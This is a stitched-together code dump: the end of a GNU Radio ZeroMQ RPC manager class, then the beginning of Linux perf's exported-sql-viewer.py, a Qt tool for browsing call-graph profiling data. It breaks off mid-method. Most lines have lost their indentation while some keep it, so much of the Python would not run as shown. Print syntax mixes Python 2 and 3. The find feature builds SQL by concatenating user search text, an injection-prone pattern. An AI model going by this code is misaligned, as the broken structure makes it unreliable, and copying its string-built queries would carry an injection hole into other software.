def set_reply_socket(self, address):
self.rep_socket = self.zmq_context.socket(zmq.REP)
self.rep_socket.bind(address)
print "[RPC] reply socket bound to: ", address
self.poller_rep.register(self.rep_socket, zmq.POLLIN)
def set_request_socket(self, address):
self.req_socket = self.zmq_context.socket(zmq.REQ)
self.req_socket.connect(address)
print "[RPC] request socket connected to: ", address
self.poller_req_out.register(self.req_socket, zmq.POLLOUT)
self.poller_req_in.register(self.req_socket, zmq.POLLIN)
def add_interface(self, id_str, callback_func):
        if id_str not in self.interfaces:
            self.interfaces[id_str] = callback_func
            print("[RPC] added reply interface:", id_str)
        else:
            print("[RPC] ERROR: duplicate id_str:", id_str)
def watcher(self):
self.keep_running = True
while self.keep_running:
# poll for calls
socks = dict(self.poller_rep.poll(10))
if socks.get(self.rep_socket) == zmq.POLLIN:
# receive call
msg = self.rep_socket.recv()
(id_str, args) = pmt.to_python(pmt.deserialize_str(msg))
print "[RPC] request:", id_str, ", args:", args
reply = self.callback(id_str, args)
self.rep_socket.send(pmt.serialize_str(pmt.to_pmt(reply)))
def start_watcher(self):
self.watcher_thread = threading.Thread(target=self.watcher,args=())
self.watcher_thread.daemon = True
self.watcher_thread.start()
def stop_watcher(self):
self.keep_running = False
self.watcher_thread.join()
def request(self, id_str, args=None):
socks = dict(self.poller_req_out.poll(10))
if socks.get(self.req_socket) == zmq.POLLOUT:
self.req_socket.send(pmt.serialize_str(pmt.to_pmt((id_str,args))))
socks = dict(self.poller_req_in.poll(10))
if socks.get(self.req_socket) == zmq.POLLIN:
reply = pmt.to_python(pmt.deserialize_str(self.req_socket.recv()))
print "[RPC] reply:", reply
return reply
def callback(self, id_str, args):
        if id_str in self.interfaces:
            callback_func = self.interfaces.get(id_str)
            if args is not None:
                # use unpacking (the splat operator *) to expand the argument list
                return callback_func(*args)
            else:
                return callback_func()
        else:
            print("[RPC] ERROR: id_str not found:", id_str)
            return None
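# Minimal loop-back usage sketch (illustrative; not part of the original GNU
# Radio module). It assumes pyzmq and GNU Radio's pmt bindings are installed,
# and the endpoint "tcp://*:6666" / "tcp://localhost:6666" is an arbitrary
# example address.
if __name__ == '__main__':
    import time
    def get_gain():
        # example callback exposed over RPC
        return [30.0]
    mgr = rpc_manager()
    mgr.set_reply_socket("tcp://*:6666")
    mgr.set_request_socket("tcp://localhost:6666")
    mgr.add_interface("get_gain", get_gain)
    mgr.start_watcher()
    time.sleep(0.5)  # give the watcher thread time to start polling
    # note: request() uses short 10 ms polls, so a None reply means a timeout
    print(mgr.request("get_gain"))  # expected reply: [30.0]
    mgr.stop_watcher()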
|
exported-sql-viewer.py
|
#!/usr/bin/env python
# SPDX-License-Identifier: GPL-2.0
# exported-sql-viewer.py: view data from sql database
# Copyright (c) 2014-2018, Intel Corporation.
# To use this script you will need to have exported data using either the
# export-to-sqlite.py or the export-to-postgresql.py script. Refer to those
# scripts for details.
#
# Following on from the example in the export scripts, a
# call-graph can be displayed for the pt_example database like this:
#
# python tools/perf/scripts/python/exported-sql-viewer.py pt_example
#
# Note that for PostgreSQL, this script supports connecting to remote databases
# by setting hostname, port, username, password, and dbname e.g.
#
# python tools/perf/scripts/python/exported-sql-viewer.py "hostname=myhost username=myuser password=mypassword dbname=pt_example"
#
# The result is a GUI window with a tree representing a context-sensitive
# call-graph. Expanding a couple of levels of the tree and adjusting column
# widths to suit will display something like:
#
#                                  Call Graph: pt_example
# Call Path                          Object        Count  Time(ns)  Time(%)  Branch Count  Branch Count(%)
# v- ls
#     v- 2638:2638
#         v- _start                  ld-2.19.so    1      10074071  100.0    211135        100.0
#           |- unknown               unknown       1      13198     0.1      1             0.0
#           >- _dl_start             ld-2.19.so    1      1400980   13.9     19637         9.3
#           >- _d_linit_internal     ld-2.19.so    1      448152    4.4      11094         5.3
#           v- __libc_start_main@plt ls            1      8211741   81.5     180397        85.4
#              >- _dl_fixup          ld-2.19.so    1      7607      0.1      108           0.1
#              >- __cxa_atexit       libc-2.19.so  1      11737     0.1      10            0.0
#              >- __libc_csu_init    ls            1      10354     0.1      10            0.0
#              |- _setjmp            libc-2.19.so  1      0         0.0      4             0.0
#              v- main               ls            1      8182043   99.6     180254        99.9
#
# Points to note:
# The top level is a command name (comm)
# The next level is a thread (pid:tid)
# Subsequent levels are functions
# 'Count' is the number of calls
# 'Time' is the elapsed time until the function returns
# Percentages are relative to the level above
# 'Branch Count' is the total number of branches for that function and all
# functions that it calls
# There is also an "All branches" report, which displays branches and
# possibly disassembly. However, presently, the only supported disassembler is
# Intel XED, and additionally the object code must be present in perf build ID
# cache. To use Intel XED, libxed.so must be present. To build and install
# libxed.so:
# git clone https://github.com/intelxed/mbuild.git mbuild
# git clone https://github.com/intelxed/xed
# cd xed
# ./mfile.py --share
# sudo ./mfile.py --prefix=/usr/local install
# sudo ldconfig
#
# Example report:
#
# Time CPU Command PID TID Branch Type In Tx Branch
# 8107675239590 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 8107675239899 2 ls 22011 22011 hardware interrupt No 7fab593ea260 _start (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675241900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 7fab593ea263 e8 c8 06 00 00 callq 0x7fab593ea930
# 8107675241900 2 ls 22011 22011 call No 7fab593ea263 _start+0x3 (ld-2.19.so) -> 7fab593ea930 _dl_start (ld-2.19.so)
# 7fab593ea930 55 pushq %rbp
# 7fab593ea931 48 89 e5 mov %rsp, %rbp
# 7fab593ea934 41 57 pushq %r15
# 7fab593ea936 41 56 pushq %r14
# 7fab593ea938 41 55 pushq %r13
# 7fab593ea93a 41 54 pushq %r12
# 7fab593ea93c 53 pushq %rbx
# 7fab593ea93d 48 89 fb mov %rdi, %rbx
# 7fab593ea940 48 83 ec 68 sub $0x68, %rsp
# 7fab593ea944 0f 31 rdtsc
# 7fab593ea946 48 c1 e2 20 shl $0x20, %rdx
# 7fab593ea94a 89 c0 mov %eax, %eax
# 7fab593ea94c 48 09 c2 or %rax, %rdx
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 8107675242232 2 ls 22011 22011 hardware interrupt No 7fab593ea94f _dl_start+0x1f (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675242900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea94f _dl_start+0x1f (ld-2.19.so)
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 7fab593ea956 48 89 15 3b 13 22 00 movq %rdx, 0x22133b(%rip)
# 8107675243232 2 ls 22011 22011 hardware interrupt No 7fab593ea956 _dl_start+0x26 (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
from __future__ import print_function
import sys
# Only change warnings if the python -W option was not used
if not sys.warnoptions:
import warnings
# PySide2 causes deprecation warnings, ignore them.
warnings.filterwarnings("ignore", category=DeprecationWarning)
import argparse
import weakref
import threading
import string
try:
# Python2
import cPickle as pickle
# size of pickled integer big enough for record size
glb_nsz = 8
except ImportError:
import pickle
glb_nsz = 16
import re
import os
import random
import copy
import math
pyside_version_1 = True
if not "--pyside-version-1" in sys.argv:
try:
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtSql import *
from PySide2.QtWidgets import *
pyside_version_1 = False
except:
pass
if pyside_version_1:
from PySide.QtCore import *
from PySide.QtGui import *
from PySide.QtSql import *
from decimal import Decimal, ROUND_HALF_UP
from ctypes import CDLL, Structure, create_string_buffer, addressof, sizeof, \
c_void_p, c_bool, c_byte, c_char, c_int, c_uint, c_longlong, c_ulonglong
from multiprocessing import Process, Array, Value, Event
# xrange is range in Python3
try:
xrange
except NameError:
xrange = range
def printerr(*args, **keyword_args):
print(*args, file=sys.stderr, **keyword_args)
# Data formatting helpers
def tohex(ip):
if ip < 0:
ip += 1 << 64
return "%x" % ip
def offstr(offset):
if offset:
return "+0x%x" % offset
return ""
def dsoname(name):
if name == "[kernel.kallsyms]":
return "[kernel]"
return name
def findnth(s, sub, n, offs=0):
pos = s.find(sub)
if pos < 0:
return pos
if n <= 1:
return offs + pos
return findnth(s[pos + 1:], sub, n - 1, offs + pos + 1)
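# e.g. findnth("a.b.c", ".", 2) == 3, the index of the second "."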
# Percent to one decimal place
def PercentToOneDP(n, d):
if not d:
return "0.0"
x = (n * Decimal(100)) / d
return str(x.quantize(Decimal(".1"), rounding=ROUND_HALF_UP))
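# e.g. PercentToOneDP(1, 3) == "33.3"; a zero denominator gives "0.0" instead
# of raising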
# Helper for queries that must not fail
def QueryExec(query, stmt):
ret = query.exec_(stmt)
if not ret:
raise Exception("Query failed: " + query.lastError().text())
# Background thread
class Thread(QThread):
done = Signal(object)
def __init__(self, task, param=None, parent=None):
super(Thread, self).__init__(parent)
self.task = task
self.param = param
def run(self):
while True:
if self.param is None:
done, result = self.task()
else:
done, result = self.task(self.param)
self.done.emit(result)
if done:
break
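# The task passed to Thread must return a (done, result) tuple; each result is
# delivered to the GUI thread via the "done" signal and the loop exits once
# done is True (see CallGraphModelBase.Find below for a typical use).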
# Tree data model
class TreeModel(QAbstractItemModel):
def __init__(self, glb, params, parent=None):
super(TreeModel, self).__init__(parent)
self.glb = glb
self.params = params
self.root = self.GetRoot()
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self.root
def rowCount(self, parent):
result = self.Item(parent).childCount()
if result < 0:
result = 0
self.dataChanged.emit(parent, parent)
return result
def hasChildren(self, parent):
return self.Item(parent).hasChildren()
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def parent(self, child):
child_item = child.internalPointer()
if child_item is self.root:
return QModelIndex()
parent_item = child_item.getParentItem()
return self.createIndex(parent_item.getRow(), 0, parent_item)
def index(self, row, column, parent):
child_item = self.Item(parent).getChildItem(row)
return self.createIndex(row, column, child_item)
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.root.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Table data model
class TableModel(QAbstractTableModel):
def __init__(self, parent=None):
super(TableModel, self).__init__(parent)
self.child_count = 0
self.child_items = []
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self
def rowCount(self, parent):
return self.child_count
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def index(self, row, column, parent):
return self.createIndex(row, column, self.child_items[row])
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Model cache
model_cache = weakref.WeakValueDictionary()
model_cache_lock = threading.Lock()
def LookupCreateModel(model_name, create_fn):
model_cache_lock.acquire()
try:
model = model_cache[model_name]
except:
model = None
if model is None:
model = create_fn()
model_cache[model_name] = model
model_cache_lock.release()
return model
def LookupModel(model_name):
model_cache_lock.acquire()
try:
model = model_cache[model_name]
except:
model = None
model_cache_lock.release()
return model
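# Windows share models by name, e.g. the call tree window below does
#   LookupCreateModel("Call Tree", lambda x=glb: CallTreeModel(x))
# so opening the same report twice reuses one model, while the weak references
# let unused models be garbage collected.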
# Find bar
class FindBar():
def __init__(self, parent, finder, is_reg_expr=False):
self.finder = finder
self.context = []
self.last_value = None
self.last_pattern = None
label = QLabel("Find:")
label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.textbox = QComboBox()
self.textbox.setEditable(True)
self.textbox.currentIndexChanged.connect(self.ValueChanged)
self.progress = QProgressBar()
self.progress.setRange(0, 0)
self.progress.hide()
if is_reg_expr:
self.pattern = QCheckBox("Regular Expression")
else:
self.pattern = QCheckBox("Pattern")
self.pattern.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.next_button = QToolButton()
self.next_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowDown))
self.next_button.released.connect(lambda: self.NextPrev(1))
self.prev_button = QToolButton()
self.prev_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowUp))
self.prev_button.released.connect(lambda: self.NextPrev(-1))
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(label)
self.hbox.addWidget(self.textbox)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.pattern)
self.hbox.addWidget(self.next_button)
self.hbox.addWidget(self.prev_button)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox)
self.bar.hide()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.textbox.lineEdit().selectAll()
self.textbox.setFocus()
def Deactivate(self):
self.bar.hide()
def Busy(self):
self.textbox.setEnabled(False)
self.pattern.hide()
self.next_button.hide()
self.prev_button.hide()
self.progress.show()
def Idle(self):
self.textbox.setEnabled(True)
self.progress.hide()
self.pattern.show()
self.next_button.show()
self.prev_button.show()
def Find(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
self.last_value = value
self.last_pattern = pattern
self.finder.Find(value, direction, pattern, self.context)
def ValueChanged(self):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
index = self.textbox.currentIndex()
data = self.textbox.itemData(index)
# Store the pattern in the combo box to keep it with the text value
if data == None:
self.textbox.setItemData(index, pattern)
else:
self.pattern.setChecked(data)
self.Find(0)
def NextPrev(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
if value != self.last_value:
index = self.textbox.findText(value)
# Allow for a button press before the value has been added to the combo box
if index < 0:
index = self.textbox.count()
self.textbox.addItem(value, pattern)
self.textbox.setCurrentIndex(index)
return
else:
self.textbox.setItemData(index, pattern)
elif pattern != self.last_pattern:
# Keep the pattern recorded in the combo box up to date
index = self.textbox.currentIndex()
self.textbox.setItemData(index, pattern)
self.Find(direction)
def NotFound(self):
QMessageBox.information(self.bar, "Find", "'" + self.textbox.currentText() + "' not found")
# Context-sensitive call graph data model item base
class CallGraphLevelItemBase(object):
def __init__(self, glb, params, row, parent_item):
self.glb = glb
self.params = params
self.row = row
self.parent_item = parent_item
self.query_done = False
self.child_count = 0
self.child_items = []
if parent_item:
self.level = parent_item.level + 1
else:
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Context-sensitive call graph data model level 2+ item base
class CallGraphLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, call_path_id, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallGraphLevelTwoPlusItemBase, self).__init__(glb, params, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.call_path_id = call_path_id
self.insn_cnt = insn_cnt
self.cyc_cnt = cyc_cnt
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True
query = QSqlQuery(self.glb.db)
if self.params.have_ipc:
ipc_str = ", SUM(insn_count), SUM(cyc_count)"
else:
ipc_str = ""
QueryExec(query, "SELECT call_path_id, name, short_name, COUNT(calls.id), SUM(return_time - call_time)" + ipc_str + ", SUM(branch_count)"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE parent_call_path_id = " + str(self.call_path_id) +
" AND comm_id = " + str(self.comm_id) +
" AND thread_id = " + str(self.thread_id) +
" GROUP BY call_path_id, name, short_name"
" ORDER BY call_path_id")
while query.next():
if self.params.have_ipc:
insn_cnt = int(query.value(5))
cyc_cnt = int(query.value(6))
branch_count = int(query.value(7))
else:
insn_cnt = 0
cyc_cnt = 0
branch_count = int(query.value(5))
child_item = CallGraphLevelThreeItem(self.glb, self.params, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), insn_cnt, cyc_cnt, branch_count, self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model level three item
class CallGraphLevelThreeItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, call_path_id, name, dso, count, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallGraphLevelThreeItem, self).__init__(glb, params, row, comm_id, thread_id, call_path_id, time, insn_cnt, cyc_cnt, branch_count, parent_item)
dso = dsoname(dso)
if self.params.have_ipc:
insn_pcnt = PercentToOneDP(insn_cnt, parent_item.insn_cnt)
cyc_pcnt = PercentToOneDP(cyc_cnt, parent_item.cyc_cnt)
br_pcnt = PercentToOneDP(branch_count, parent_item.branch_count)
ipc = CalcIPC(cyc_cnt, insn_cnt)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(insn_cnt), insn_pcnt, str(cyc_cnt), cyc_pcnt, ipc, str(branch_count), br_pcnt ]
else:
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = call_path_id
# Context-sensitive call graph data model level two item
class CallGraphLevelTwoItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, pid, tid, parent_item):
super(CallGraphLevelTwoItem, self).__init__(glb, params, row, comm_id, thread_id, 1, 0, 0, 0, 0, parent_item)
if self.params.have_ipc:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallGraphLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.insn_cnt += child_item.insn_cnt
self.cyc_cnt += child_item.cyc_cnt
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
if self.params.have_ipc:
child_item.data[6] = PercentToOneDP(child_item.insn_cnt, self.insn_cnt)
child_item.data[8] = PercentToOneDP(child_item.cyc_cnt, self.cyc_cnt)
child_item.data[11] = PercentToOneDP(child_item.branch_count, self.branch_count)
else:
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Context-sensitive call graph data model level one item
class CallGraphLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, params, row, comm_id, comm, parent_item):
super(CallGraphLevelOneItem, self).__init__(glb, params, row, parent_item)
if self.params.have_ipc:
self.data = [comm, "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallGraphLevelTwoItem(self.glb, self.params, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model root item
class CallGraphRootItem(CallGraphLevelItemBase):
def __init__(self, glb, params):
super(CallGraphRootItem, self).__init__(glb, params, 0, None)
self.dbid = 0
self.query_done = True
if_has_calls = ""
if IsSelectable(glb.db, "comms", columns = "has_calls"):
if_has_calls = " WHERE has_calls = " + glb.dbref.TRUE
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms" + if_has_calls)
while query.next():
if not query.value(0):
continue
child_item = CallGraphLevelOneItem(glb, params, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Call graph model parameters
class CallGraphModelParams():
def __init__(self, glb, parent=None):
self.have_ipc = IsSelectable(glb.db, "calls", columns = "insn_count, cyc_count")
# Context-sensitive call graph data model base
class CallGraphModelBase(TreeModel):
def __init__(self, glb, parent=None):
super(CallGraphModelBase, self).__init__(glb, CallGraphModelParams(glb), parent)
def FindSelect(self, value, pattern, query):
if pattern:
# postgresql and sqlite pattern patching differences:
# postgresql LIKE is case sensitive but sqlite LIKE is not
# postgresql LIKE allows % and _ to be escaped with \ but sqlite LIKE does not
# postgresql supports ILIKE which is case insensitive
# sqlite supports GLOB (text only) which uses * and ? and is case sensitive
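            # e.g. a user pattern of "main*" becomes LIKE 'main%' on postgresql
            # and GLOB 'main*' on sqlite; a plain (non-pattern) value is matched
            # with equality below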
if not self.glb.dbref.is_sqlite3:
# Escape % and _
s = value.replace("%", "\%")
s = s.replace("_", "\_")
# Translate * and ? into SQL LIKE pattern characters % and _
                # string.maketrans() was removed in Python3; use str.maketrans there
                if sys.version_info[0] == 3:
                    trans = str.maketrans("*?", "%_")
                else:
                    trans = string.maketrans("*?", "%_")
match = " LIKE '" + str(s).translate(trans) + "'"
else:
match = " GLOB '" + str(value) + "'"
else:
match = " = '" + str(value) + "'"
self.DoFindSelect(query, match)
def Found(self, query, found):
if found:
return self.FindPath(query)
return []
def FindValue(self, value, pattern, query, last_value, last_pattern):
if last_value == value and pattern == last_pattern:
found = query.first()
else:
self.FindSelect(value, pattern, query)
found = query.next()
return self.Found(query, found)
def FindNext(self, query):
found = query.next()
if not found:
found = query.first()
return self.Found(query, found)
def FindPrev(self, query):
found = query.previous()
if not found:
found = query.last()
return self.Found(query, found)
def FindThread(self, c):
if c.direction == 0 or c.value != c.last_value or c.pattern != c.last_pattern:
ids = self.FindValue(c.value, c.pattern, c.query, c.last_value, c.last_pattern)
elif c.direction > 0:
ids = self.FindNext(c.query)
else:
ids = self.FindPrev(c.query)
return (True, ids)
def Find(self, value, direction, pattern, context, callback):
class Context():
def __init__(self, *x):
self.value, self.direction, self.pattern, self.query, self.last_value, self.last_pattern = x
def Update(self, *x):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = x + (self.value, self.pattern)
if len(context):
context[0].Update(value, direction, pattern)
else:
context.append(Context(value, direction, pattern, QSqlQuery(self.glb.db), None, None))
# Use a thread so the UI is not blocked during the SELECT
thread = Thread(self.FindThread, context[0])
thread.done.connect(lambda ids, t=thread, c=callback: self.FindDone(t, c, ids), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, ids):
callback(ids)
# Context-sensitive call graph data model
class CallGraphModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallGraphModel, self).__init__(glb, parent)
def GetRoot(self):
return CallGraphRootItem(self.glb, self.params)
def columnCount(self, parent=None):
if self.params.have_ipc:
return 12
else:
return 7
def columnHeader(self, column):
if self.params.have_ipc:
headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Insn Cnt", "Insn Cnt (%)", "Cyc Cnt", "Cyc Cnt (%)", "IPC", "Branch Count ", "Branch Count (%) "]
else:
headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
if self.params.have_ipc:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
else:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT call_path_id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE calls.id <> 0"
" AND symbols.name" + match +
" GROUP BY comm_id, thread_id, call_path_id"
" ORDER BY comm_id, thread_id, call_path_id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM call_paths"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
# The call path root is not used
if ids[0] == 1:
del ids[0]
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Call tree data model level 2+ item base
class CallTreeLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, calls_id, call_time, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallTreeLevelTwoPlusItemBase, self).__init__(glb, params, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.calls_id = calls_id
self.call_time = call_time
self.time = time
self.insn_cnt = insn_cnt
self.cyc_cnt = cyc_cnt
self.branch_count = branch_count
def Select(self):
self.query_done = True
if self.calls_id == 0:
comm_thread = " AND comm_id = " + str(self.comm_id) + " AND thread_id = " + str(self.thread_id)
else:
comm_thread = ""
if self.params.have_ipc:
ipc_str = ", insn_count, cyc_count"
else:
ipc_str = ""
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT calls.id, name, short_name, call_time, return_time - call_time" + ipc_str + ", branch_count"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE calls.parent_id = " + str(self.calls_id) + comm_thread +
" ORDER BY call_time, calls.id")
while query.next():
if self.params.have_ipc:
insn_cnt = int(query.value(5))
cyc_cnt = int(query.value(6))
branch_count = int(query.value(7))
else:
insn_cnt = 0
cyc_cnt = 0
branch_count = int(query.value(5))
child_item = CallTreeLevelThreeItem(self.glb, self.params, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), insn_cnt, cyc_cnt, branch_count, self)
self.child_items.append(child_item)
self.child_count += 1
# Call tree data model level three item
class CallTreeLevelThreeItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, calls_id, name, dso, call_time, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallTreeLevelThreeItem, self).__init__(glb, params, row, comm_id, thread_id, calls_id, call_time, time, insn_cnt, cyc_cnt, branch_count, parent_item)
dso = dsoname(dso)
if self.params.have_ipc:
insn_pcnt = PercentToOneDP(insn_cnt, parent_item.insn_cnt)
cyc_pcnt = PercentToOneDP(cyc_cnt, parent_item.cyc_cnt)
br_pcnt = PercentToOneDP(branch_count, parent_item.branch_count)
ipc = CalcIPC(cyc_cnt, insn_cnt)
self.data = [ name, dso, str(call_time), str(time), PercentToOneDP(time, parent_item.time), str(insn_cnt), insn_pcnt, str(cyc_cnt), cyc_pcnt, ipc, str(branch_count), br_pcnt ]
else:
self.data = [ name, dso, str(call_time), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = calls_id
# Call tree data model level two item
class CallTreeLevelTwoItem(CallTreeLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, pid, tid, parent_item):
super(CallTreeLevelTwoItem, self).__init__(glb, params, row, comm_id, thread_id, 0, 0, 0, 0, 0, 0, parent_item)
if self.params.have_ipc:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallTreeLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.insn_cnt += child_item.insn_cnt
self.cyc_cnt += child_item.cyc_cnt
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
if self.params.have_ipc:
child_item.data[6] = PercentToOneDP(child_item.insn_cnt, self.insn_cnt)
child_item.data[8] = PercentToOneDP(child_item.cyc_cnt, self.cyc_cnt)
child_item.data[11] = PercentToOneDP(child_item.branch_count, self.branch_count)
else:
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Call tree data model level one item
class CallTreeLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, params, row, comm_id, comm, parent_item):
super(CallTreeLevelOneItem, self).__init__(glb, params, row, parent_item)
if self.params.have_ipc:
self.data = [comm, "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
